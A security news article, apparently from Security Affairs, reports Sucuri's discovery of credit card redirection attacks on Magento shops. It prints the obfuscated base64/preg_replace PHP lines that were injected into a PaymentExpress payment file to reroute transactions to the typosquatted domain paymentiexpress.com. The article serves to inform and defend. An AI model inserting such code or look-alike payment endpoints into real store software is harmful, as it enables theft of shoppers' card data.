Credit Card Redirection, the evolution of phishing

Researchers at Securi discover Credit Card Redirection attack technique to hijack credit card data during transactions on e-commerce sites.

With the term credit card redirection is indicated the illegal practice to steal credit and debit card information compromising legitimate web services. Security experts are observing an increase of credit card redirection cases, cyber criminals are varying their attack method compromising legitimate shopping websites instead to deceive them with spoofed emails that lead to specially crafted phishing sites.

The user that access to  the compromised e-commerce site is stealthily redirected to a well designed phishing site, so that the website could acquire card info and send it back to the attackers. The redirection is possible also modifying the credit card processing file giving to the criminals the access to all the transaction data including credit card details (name, address, CC and CVV).

“The attackers modify the flow of the payment process so that instead of just processing the card, they redirect all payment details to a domain they own so they can steal the card details.”

The phishing site was usually well crafted adopting also a valid SSL certificate to reassure the users, Credit Card Redirection is considered an evolution of phishing.

Websites implementing e-commerce service are under attack, in particular those ones using open source e-commerce system Magento.

For the popular e-commerce platform has been observed in one case that the file used for payment handling is altered to replace every occurrence of paymentexpress.com for paymentiexpress.com, that is resulted as a domain managed by cyber criminals.

The domains are registered few weeks before the attacks until they are blacklisted.

Registration Service Provided By: Namecheap.com
Contact: support@namecheap.com
Visit: http://namecheap.com
Registered through: eNom, Inc.
Creation date: 18 Jul 2013 18:02:00
Expiration date: 18 Jul 2014 18:02:00

Daniel Cid, Chief Technology Officer at Sucuri, described the technique in a blog post.

“Instead of tricking users into clicking into a bad URL, [malicious code] tricks the site itself to redirect the users information there,”

Because of the nature of Magento websites, they are a big target. We are seeing sites having the credit card processing file modified to either email the credit card details or redirect them to a new domain. In this specific case, the file “app/code/community/MageBase/DpsPaymentExpress/Model/Method/Pxpay.php” (use for PaymentExpress payment handling) was modified with this code:

$oo = base64_decode(‘cGF5bWVudGV4cHJlc3M=’); $_oo = base64_decode(“cGF5bWVudGlleHByZXNz’);$_is = base64_decode(“c2Vzc19pZA==’);
$_oi = base64_decode(“cHJlZ19yZXBsYWNl’);
$responseURI = $_oi(‘/’.$oo.’/’,$_oo,strval($responseXml->URI));

Which once decoded, replaces every occurrence of paymentexpress for paymentiexpress (see extra i). This forces the payment processing to be tunneled here:

https://sec.paymentiexpress.com/pxpay/pxaccess.aspx (see the i again)

Instead of the real URL:

https://sec.paymentexpress.com/pxpay/pxaccess.aspx

What is more concerning regarding credit card redirection is that the technique could have serious impact on a wide audience, e-commerce platforms such as Magento are very diffused within SMB and big name brands like  Samsung.

To reduce the risk of fraud it’s strongly suggested to e-commerce site administrators to monitor the payment platform of their website to avoid the insertion of malicious code for the above purpose.

Pierluigi Paganini

(Security Affairs – Credit Card Redirection, hacking)